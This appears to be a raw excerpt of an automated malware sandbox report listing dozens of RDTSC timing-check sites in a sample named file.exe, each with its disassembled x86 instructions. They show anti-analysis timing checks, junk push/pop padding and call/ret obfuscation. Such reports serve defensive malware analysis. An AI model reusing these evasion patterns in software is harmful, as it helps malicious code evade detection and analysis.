Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 710280 second address: 71029E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F60A4BE8BDAh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71029E second address: 7102A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71338B second address: 71338F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71338F second address: 713398 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 713670 second address: 713674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 713674 second address: 713692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F60A4E98F06h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7137E7 second address: 7137F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F60A4BE8BD6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7137F4 second address: 713818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4E98EFCh 0x00000009 jmp 00007F60A4E98F04h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715C0A second address: 715C29 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edx 0x0000000b pushad 0x0000000c ja 00007F60A4BE8BD6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715C29 second address: 715C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7167C3 second address: 7167C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 716C0A second address: 716C0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 716D21 second address: 716D3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+124442E7h], ecx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jno 00007F60A4BE8BD6h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7172E5 second address: 7172EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7172EE second address: 717370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F60A4BE8BD8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push edi 0x00000028 mov dword ptr [ebp+122D37C5h], edx 0x0000002e pop edi 0x0000002f push 00000000h 0x00000031 mov si, B61Ch 0x00000035 pushad 0x00000036 add ebx, dword ptr [ebp+122D2E12h] 0x0000003c mov si, 7E3Dh 0x00000040 popad 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push ecx 0x00000046 call 00007F60A4BE8BD8h 0x0000004b pop ecx 0x0000004c mov dword ptr [esp+04h], ecx 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc ecx 0x00000059 push ecx 0x0000005a ret 0x0000005b pop ecx 0x0000005c ret 0x0000005d sbb esi, 1A7B6F7Ch 0x00000063 push eax 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7199E4 second address: 7199EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A33C second address: 71A3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F60A4BE8BD8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jmp 00007F60A4BE8BE8h 0x00000028 pushad 0x00000029 jmp 00007F60A4BE8BE5h 0x0000002e cmc 0x0000002f popad 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F60A4BE8BD8h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c sub esi, dword ptr [ebp+1244987Eh] 0x00000052 push 00000000h 0x00000054 mov edi, 188BE292h 0x00000059 xchg eax, ebx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F60A4BE8BDCh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A3DC second address: 71A3E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A3E2 second address: 71A3E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71A3E8 second address: 71A3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71AEFB second address: 71AF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71ABF0 second address: 71ABF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B712 second address: 71B716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71B716 second address: 71B73C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F60A4E98EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F60A4E98F07h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71FB86 second address: 71FBAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d ja 00007F60A4BE8BD6h 0x00000013 je 00007F60A4BE8BD6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72230E second address: 722314 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7232A6 second address: 7232C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F60A4BE8BE3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72428A second address: 72428E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71ED8A second address: 71EE28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F60A4BE8BE7h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push ecx 0x0000000f jmp 00007F60A4BE8BE8h 0x00000014 pop edi 0x00000015 mov ebx, dword ptr [ebp+122D2D66h] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 jnl 00007F60A4BE8BD9h 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F60A4BE8BD8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 push eax 0x0000004a mov ebx, dword ptr [ebp+122D31ACh] 0x00000050 pop edi 0x00000051 mov eax, dword ptr [ebp+122D0935h] 0x00000057 push FFFFFFFFh 0x00000059 jmp 00007F60A4BE8BDDh 0x0000005e nop 0x0000005f push ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 push ecx 0x00000063 pop ecx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72428E second address: 7242F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F60A4E98EF8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 add bx, 148Eh 0x0000002c push 00000000h 0x0000002e mov edi, ecx 0x00000030 push 00000000h 0x00000032 pushad 0x00000033 mov dword ptr [ebp+122D31A7h], ebx 0x00000039 adc dx, 72FAh 0x0000003e popad 0x0000003f xor dword ptr [ebp+1244FE43h], eax 0x00000045 xchg eax, esi 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 jno 00007F60A4E98EF6h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723470 second address: 723474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71EE28 second address: 71EE2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7242F4 second address: 724302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F60A4BE8BD6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723474 second address: 72347A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72347A second address: 723480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723480 second address: 723484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 723484 second address: 7234A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c jmp 00007F60A4BE8BE7h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72525A second address: 7252C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d movsx ebx, si 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F60A4E98EF8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c adc ebx, 65A75ED4h 0x00000032 push 00000000h 0x00000034 and bx, D490h 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F60A4E98F09h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72443E second address: 724442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 724442 second address: 724446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 727398 second address: 7273FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, dx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F60A4BE8BD8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F60A4BE8BD8h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 push eax 0x00000046 pushad 0x00000047 push edi 0x00000048 jp 00007F60A4BE8BD6h 0x0000004e pop edi 0x0000004f push eax 0x00000050 push edx 0x00000051 push esi 0x00000052 pop esi 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7284E7 second address: 7284EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7284EB second address: 7284FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b js 00007F60A4BE8BD6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7284FE second address: 728503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72960D second address: 729616 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 729616 second address: 729666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F60A4E98EF6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F60A4E98EF8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b mov di, ax 0x0000002e push 00000000h 0x00000030 mov ebx, dword ptr [ebp+122D2C82h] 0x00000036 jne 00007F60A4E98EFCh 0x0000003c push eax 0x0000003d push ecx 0x0000003e pushad 0x0000003f push edi 0x00000040 pop edi 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A5AE second address: 72A5C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A5C8 second address: 72A5EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F60A4E98F05h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jbe 00007F60A4E98F00h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A5EE second address: 72A63F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F60A4BE8BDCh 0x0000000c push 00000000h 0x0000000e jbe 00007F60A4BE8BDAh 0x00000014 mov bx, 1AB2h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F60A4BE8BD8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 ja 00007F60A4BE8BDCh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A63F second address: 72A65E instructions: 0x00000000 rdtsc 0x00000002 je 00007F60A4E98EFCh 0x00000008 jne 00007F60A4E98EF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F60A4E98EFCh 0x00000019 jo 00007F60A4E98EF6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B5E7 second address: 72B5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 729838 second address: 72983C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72983C second address: 729842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A7BF second address: 72A7C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A884 second address: 72A88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72D533 second address: 72D538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 728724 second address: 728728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 728728 second address: 72872E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B7A6 second address: 72B7AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B858 second address: 72B874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F60A4E98F03h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72B874 second address: 72B879 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72E6F1 second address: 72E6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72F762 second address: 72F776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F60A4BE8BD6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72F776 second address: 72F783 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60A4E98EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72F859 second address: 72F85E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 737D9E second address: 737DA4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D67A2 second address: 6D67C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F60A4BE8BD6h 0x0000000f jnl 00007F60A4BE8BD6h 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a jnp 00007F60A4BE8BE2h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D67C4 second address: 6D67D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F60A4E98EF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7374F5 second address: 737501 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60A4BE8BDEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 737669 second address: 73766D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73792C second address: 737930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 737930 second address: 737945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F60A4E98EFBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C17B second address: 73C181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C181 second address: 73C192 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C192 second address: 73C196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C196 second address: 73C1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edx 0x0000000a jmp 00007F60A4E98F05h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 je 00007F60A4E98EFEh 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73DBAF second address: 73DBB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74520B second address: 745211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745211 second address: 745217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745217 second address: 745221 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60A4E98EF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7445D6 second address: 7445DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
